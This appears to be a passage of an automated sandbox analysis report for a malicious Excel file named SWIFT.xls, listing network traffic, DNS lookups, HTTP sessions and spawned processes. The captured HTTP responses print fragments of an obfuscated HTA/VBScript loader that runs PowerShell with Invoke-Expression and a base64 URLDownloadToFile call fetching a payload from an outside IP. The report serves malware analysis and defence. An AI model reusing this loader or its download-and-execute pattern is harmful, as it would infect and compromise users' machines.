              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . f T A ' ! . T V . . m h L } / . 8 . < . . [ I . . . . . . . 3 . . . \\ . p . F ` . y . 1 . r . 0 I Y . V & o ) b Q . k s 6 7 ` . d E K . . . ^ M s N V . . w . * i . H . . . > s . j l f 7 J . . 3 O c ] . . I A L B . . . H a . . . 6 . . . = . . . . . . . . . . x Q ( A . f j . . b 4 8 . . . 2 . . . . " . . . . P > . . . . P . . . . . . . . = . . . _ 4 4 . . m . t @ . . . # . . . . . . " . . . . ` . . . . % . . . ! y . . . B 1 . . . . . k K S . . ! . O
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 fb 11 c7 08 66 54 c5 41 e1 27 21 8d e0 c7 08 c5 ea 9a d0 54 56 a7 0b c3 2e 86 6d 68 4c 7d 2f 04 df c0 38 f1 ea 9a 05 bc 3c 0c 97 1c 5b 49 89 eb e1 00 02 00 b0 04 c1 00 02 00 8a 33 e2 00 00 00 5c 00 70 00 88 d1 46 cf 60 ed 19 79 0c cd 31 fa 01 72 2e 30 a1 d2 cd 49 fb 59 08 fe a5 f5 56 26 6f 9b
              TimestampSource PortDest PortSource IPDest IP
              Dec 20, 2024 15:21:54.018548012 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:54.018635035 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:54.018708944 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:54.019040108 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:54.019069910 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:55.670550108 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:55.670830011 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:55.699790955 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:55.699842930 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:55.700783968 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:55.700877905 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:55.701332092 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:55.743361950 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:57.298877954 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:57.299019098 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:57.299138069 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:57.304349899 CET49811443192.168.2.514.103.79.10
              Dec 20, 2024 15:21:57.304377079 CET4434981114.103.79.10192.168.2.5
              Dec 20, 2024 15:21:57.306093931 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:57.427445889 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:57.427541971 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:57.427826881 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:57.547875881 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703012943 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703057051 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703097105 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703159094 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.703193903 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703227997 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.703232050 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703250885 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.703268051 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703344107 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.703344107 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.703866959 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.703922987 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.704085112 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.704118013 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.704144955 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.704154015 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.704185009 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.704207897 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.823880911 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.823966980 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.823966026 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.824027061 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.827976942 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.828044891 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.897053957 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.897147894 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.897268057 CET804982057.129.55.225192.168.2.5
              Dec 20, 2024 15:21:58.897322893 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.971995115 CET4982080192.168.2.557.129.55.225
              Dec 20, 2024 15:21:58.972059011 CET4982080192.168.2.557.129.55.225
              TimestampSource PortDest PortSource IPDest IP
              Dec 20, 2024 15:21:53.275732994 CET5111753192.168.2.51.1.1.1
              Dec 20, 2024 15:21:54.017867088 CET53511171.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Dec 20, 2024 15:21:53.275732994 CET192.168.2.51.1.1.10x8b92Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Dec 20, 2024 15:21:08.963913918 CET1.1.1.1192.168.2.50x18a4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Dec 20, 2024 15:21:08.963913918 CET1.1.1.1192.168.2.50x18a4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Dec 20, 2024 15:21:17.353897095 CET1.1.1.1192.168.2.50xbfb2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
              Dec 20, 2024 15:21:17.353897095 CET1.1.1.1192.168.2.50xbfb2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
              Dec 20, 2024 15:21:29.700484991 CET1.1.1.1192.168.2.50xd2b3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
              Dec 20, 2024 15:21:29.700484991 CET1.1.1.1192.168.2.50xd2b3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
              Dec 20, 2024 15:21:54.017867088 CET1.1.1.1192.168.2.50x8b92No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
              Dec 20, 2024 15:22:13.524734020 CET1.1.1.1192.168.2.50xba34No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Dec 20, 2024 15:22:13.524734020 CET1.1.1.1192.168.2.50xba34No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              • s.deemos.com
              • 57.129.55.225
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.54982057.129.55.225801812C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              Dec 20, 2024 15:21:57.427826881 CET258OUTGET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
              Connection: Keep-Alive
              Host: 57.129.55.225
              Dec 20, 2024 15:21:58.703012943 CET1236INHTTP/1.1 200 OK
              Date: Fri, 20 Dec 2024 14:21:58 GMT
              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
              Last-Modified: Fri, 20 Dec 2024 11:02:40 GMT
              ETag: "3de8-629b195d93fcb"
              Accept-Ranges: bytes
              Content-Length: 15848
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: application/hta
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 43 52 49 70 54 20 74 79 50 65 3d 22 74 45 58 54 2f 56 62 53 63 72 49 70 74 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><SCRIpT tyPe="tEXT/VbScrIpt">DImTUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavFUYJDgljBcoVTGVgjlVafReLGKBypgjeaBBHRRHyfZxqVSpPJjGgddadhwAgJUbZXRonwNFshOsRSEt,
              Dec 20, 2024 15:21:58.703057051 CET224INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 58 63 47 4b 49 64 70 4f 41 4c 5a 4e 79 72 57 56 74 4c 4a 70 46 67 42 52 58 73 65 43 59 6d 64
              Data Ascii: XcGKIdpOALZNyrWVtLJpFgBRXseCYmddnfvurREaxWhYTWFErYzdIQJGSTXKhHTyEtPGIVnsnQBLWTwanFxGFkbddKhjIriIRiUVccXTRIpBbYelcTMAOcmjzgPzVcEJUNTOUcrFfLGYCZloFeyoHhYa
              Dec 20, 2024 15:21:58.703097105 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: :
              Dec 20, 2024 15:21:58.703193903 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 63 72 45 61 74 45 6f 62 6a 65 43 54 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: crEatEobjeCT
              Dec 20, 2024 15:21:58.703232050 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: :
              Dec 20, 2024 15:21:58.703268051 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 63 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnC
              Dec 20, 2024 15:21:58.703866959 CET1236INData Raw: 30 55 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 58 70 47 56 48 4a 47 52 57 77 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41
              Data Ascii: 0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNv
              Dec 20, 2024 15:21:58.704085112 CET1236INData Raw: 4a 55 62 5a 58 52 6f 6e 77 4e 46 73 68 4f 73 52 53 45 74 2e 72 55 4e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: JUbZXRonwNFshOsRSEt.rUN
              Dec 20, 2024 15:21:58.704118013 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: TUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavF
              Dec 20, 2024 15:21:58.704154015 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: cHR
              Dec 20, 2024 15:21:58.823880911 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 63 48 52 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
              Data Ascii: cHR


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.54981114.103.79.104431812C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              2024-12-20 14:21:55 UTC224OUTGET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: s.deemos.com
              Connection: Keep-Alive
              2024-12-20 14:21:57 UTC470INHTTP/1.1 302 Found
              Date: Fri, 20 Dec 2024 14:21:57 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 110
              Connection: close
              X-DNS-Prefetch-Control: off
              X-Frame-Options: SAMEORIGIN
              Strict-Transport-Security: max-age=15724800; includeSubDomains
              X-Download-Options: noopen
              X-Content-Type-Options: nosniff
              X-XSS-Protection: 1; mode=block
              Location: http://57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
              Vary: Accept
              2024-12-20 14:21:57 UTC110INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 35 37 2e 31 32 39 2e 35 35 2e 32 32 35 2f 32 32 35 2f 65 6e 6e 2f 6d 6e 69 73 63 72 65 65 6e 74 68 69 6e 6b 69 6e 67 67 6f 6f 64 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 6f 6f 64 66 6f 74 62 75 73 75 62 65 73 73 74 68 69 6e 67 73 2e 68 74 61
              Data Ascii: Found. Redirecting to http://57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:09:20:59
              Start date:20/12/2024
              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
              Imagebase:0x640000
              File size:53'161'064 bytes
              MD5 hash:4A871771235598812032C822E6F68F19
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:5
              Start time:09:21:57
              Start date:20/12/2024
              Path:C:\Windows\SysWOW64\mshta.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
              Imagebase:0xb0000
              File size:13'312 bytes
              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              Target ID:7
              Start time:09:22:05
              Start date:20/12/2024
              Path:C:\Windows\splwow64.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\splwow64.exe 12288
              Imagebase:0x7ff692640000
              File size:163'840 bytes
              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:9
              Start time:09:22:16
              Start date:20/12/2024
              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
              Imagebase:0x7ff686a00000
              File size:5'641'176 bytes
              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:09:22:21
              Start date:20/12/2024
              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls"
              Imagebase:0x640000
              File size:53'161'064 bytes
              MD5 hash:4A871771235598812032C822E6F68F19
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              No disassembly